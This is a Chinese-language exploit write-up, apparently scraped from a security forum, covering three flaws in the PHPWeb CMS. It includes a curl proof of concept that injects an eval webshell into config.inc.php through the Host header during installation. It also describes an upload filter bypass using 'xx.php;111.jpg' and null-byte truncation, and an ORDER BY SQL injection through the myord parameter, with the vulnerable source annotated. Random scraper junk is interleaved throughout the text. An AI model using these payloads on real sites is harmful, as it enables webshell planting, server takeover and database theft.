phpweb成品网站最新版(注入、上传、写shell)

admin

注入：

之所以鸡肋就是该漏洞利用安装文件 重新生成 配置文件 写入可执行代码

* V, K9 l& W% \! _2 C鸡肋1： 具有破坏性 动作非常大 重新写了配置文件 数据库连接文件
鸡肋2： 有一定安全常识的站长都会删掉 install 目录
( b2 ?, O+ H1 M  S
4 O- a$ \0 m1 {4 [, L# ]7 m虽然鸡肋 但也有优点 ： 不受 magic_quotes_gpc 、 webserver 影响
+ C3 y' u' }  W) C) ?
* H/ Y+ ?$ N' ]分析：

$ X/ _6 c. I8 ]
$siteurl="http://".$_SERVER["HTTP_HOST"]."/";    //未过滤
8 T6 U* \% c$ i
+ `) D! n" k) u3 S, g) l) z                                            $filestr = fread(fopen($SysConfigFile, 'r'),30000);
                                            $filestr=str_replace(" ","",$filestr);
                                            $filestr=str_replace("DefaultDbHost",$dbhost,$filestr);
# E' P; {% J' C; q* q                                            $filestr=str_replace("DefaultDbName",$dbname,$filestr);
                                            $filestr=str_replace("DefaultDbUser",$dbuser,$filestr);
                                            $filestr=str_replace("DefaultDbPass",$dbpwd,$filestr);
# D# t8 g2 t1 o2 A4 J" p) t1 C                                            $filestr=str_replace("DefaultsLan","zh_cn",$filestr);
. p; }/ D6 M) ]                                            $filestr=str_replace("DefaultTablePre",$tablepre,$filestr);
                                            $filestr=str_replace("DefaultSiteUrl",$siteurl,$filestr);

2 ~$ D) z$ e. Z$ Y9 W* U                                            fwrite(fopen($ConFile,"w"),$filestr,30000);
4 V* u  y( ?! Q& g8 E% A6 n( ~8 g' ?$_SERVER["HTTP_HOST"] 就是 http head 中HOST传递过来的 可控制,并且不受 magic_quotes_gpc 影响 ^ _ ^

+ x. X' S" P# ^4 i9 W( Fpoc：

* m; n1 ]& A$ K?
1
; g( @2 u+ c! i4 A0 ?+ _, A8 vcurl http://fuck.0day5.com/base/install/index.php --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"
( J* R  C$ E  i9 F: N: ushell地址: /config.inc.php
+ J# h3 m0 I$ o* k1 {. M% [1 }5 p跟之前的 phpcms一样 需要远程数据库

——————————————————–
上传漏洞(需要进后台)：
; ^6 X1 l- h2 B3 z! [漏洞文件: /kedit/upload_cgi/upload.php
这个很多人都知道,但是很鸡肋 iis6 解析 或 GPC off条件下才可利用


<?php
4 ^% k4 S& I( ]0 r" G    define("ROOTPATH", "../../");
0 F4 [7 i1 J1 P  K4 e2 W    include(ROOTPATH."includes/admin.inc.php");
    NeedAuth(0);

" N' W0 J( g# i( k' B2 }    $dt=date("Ymd",time());
4 H& d( u1 e' ~7 E2 ?/ v% A" ~    if(!is_dir(ROOTPATH.$_POST['attachPath'].$dt)){
            @mkdir(ROOTPATH.$_POST['attachPath'].$dt,0777);
    }

7 b$ C8 k4 _+ ?. l$ R. C    //文件保存目录路径
, L( H* e7 D4 o3 h    $save_path = ROOTPATH.$_POST['attachPath'].$dt.'/';
    echo $save_path;
    //文件保存目录URL
! e  N; u+ n/ C    $save_url = '../../'.$_POST['attachPath'].$dt.'/';

  B3 L" ^- e0 G# [$ \: Y) V+ e/ a    //定义允许上传的文件扩展名
    $ext_arr = array('gif','jpg','png','bmp'); //限制后缀

    //最大文件大小
    $max_size = 1000000;

    //更改目录权限
    @mkdir($save_path, 0777);
# i1 h3 t9 Y& N( e) d" s- R
    //文件的全部路径
    $file_path = $save_path.$_POST['fileName'];   //保存文件名
8 J* K+ K. I2 u2 r
    //文件URL
    $file_url = $save_url.$_POST['fileName'];
//有上传文件时
+ ~0 X  g+ {' r! \! Y/ I% G. g" D& y    if (empty($_FILES) === false) {

' N7 {! F5 h, m" ?% c5 A8 H* `            //原文件名
            $file_name = $_FILES['fileData']['name'];
5 ~! Y% m0 L9 d' b4 |  Y            //服务器上临时文件名
% V! |4 Q1 S- j" S+ U6 D8 g            $tmp_name = $_FILES['fileData']['tmp_name'];
            //文件大小
            $file_size = $_FILES['fileData']['size'];
            //检查目录
            if (@is_dir($save_path) === false) {
                    alert("上传目录不存在。");
            }
            //检查目录写权限
            if (@is_writable($save_path) === false) {
                    alert("上传目录没有写权限。");
            }
  H; O- y# Q# q$ @/ a+ D" M            //检查是否已上传
            if (@is_uploaded_file($tmp_name) === false) {
                    alert("临时文件可能不是上传文件。");
2 q# e1 }' R6 ^3 C4 Q, ^0 n* B6 h            }
            //检查文件大小
2 W  k6 L, L8 C; Y9 x) `            if ($file_size > $max_size) {
                    alert("上传文件大小超过限制。");
& J2 U( o; M% k+ u            }
            //获得文件扩展名
            $temp_arr = explode(".", $_POST['fileName']);
            $file_ext = array_pop($temp_arr);
            $file_ext = trim($file_ext);
/ s$ y; w) R5 G            $file_ext = strtolower($file_ext);

            //检查扩展名   
! ~' U9 U3 u9 F3 W8 c+ W% K7 ~            if (in_array($file_ext, $ext_arr) === false) {     
                    alert("上传文件扩展名是不允许的扩展名。");
& `9 g, v. @& \7 \$ {1 Z0 q            }

+ L  Q7 `2 {6 ^7 k9 L, N            //移动文件   
! M6 e* T& H. L. X. f            //未重命名 虽然过滤了 后缀   iis 6解析漏洞 ^ _ ^
            if (move_uploaded_file($tmp_name, $file_path) === false) {
* b+ [, Y2 a2 f3 q1 O5 N' J; l% a                    alert("上传文件失败。");
            }
/ p: V6 F6 v. l* g+ H1 Q3 e. ^) e) e
            @chmod($file_path,0666);
9 g, }* v; n; e. e  O
    ?>
- z2 y5 o1 K9 `) v+ v. h% d抓包改包 filename 改为 xx.php;111.jpg 即可突破或者使用http://www.0day5.com/?p=227

4 m8 i# N2 m2 l/ V" hapache 版本magic_quotes_gpc = off情况下可以考虑 \00 截断 绕过

  K9 L# R; F, n& z——————————————————
注入漏洞：
漏洞文件:search/module/search.php
/search/index.php?key=1&myord=1 [sqlinjection]
- n) J" x( C' V: p( Z4 Y1 Y9 y. f

9 w3 ~/ F  j. K( }# i<?php
   //       ... 省略 n 行...
   //第18行:
# w- s$ Z! }8 V: Q+ d, n7 H           $key=htmlspecialchars($_GET["key"]);   //只是简单的将字符HTML 实体 编码   , mysql 注入不受此影响
           $page=htmlspecialchars($_GET["page"]);
           $myord=htmlspecialchars($_GET["myord"]);
8 o, F4 ?$ I9 r
2 o. _0 W& x: x, `  |   //       ... 省略 n 行...
   $key,$myord 两个参数带入查询
) L( V( d" J9 ]   //第47行 $key:

8 u" K$ E7 t; W7 h/ K1 T# Y   $fsql->query("select count(id) from {P}_news_con where iffb='1' and catid!='0' and (title regexp '$key' or body regexp '$key')");  //虽然带入查询 但使用的 是regexp 不知如何绕过..

   //第197行 $myord
   $fsql->query($scl . " order by $myord desc limit $pagelimit ");    产生注入
& L8 O$ T9 p- [* U
, Y, j3 H' ^- ~9 B" U2 @$ m% |   ?>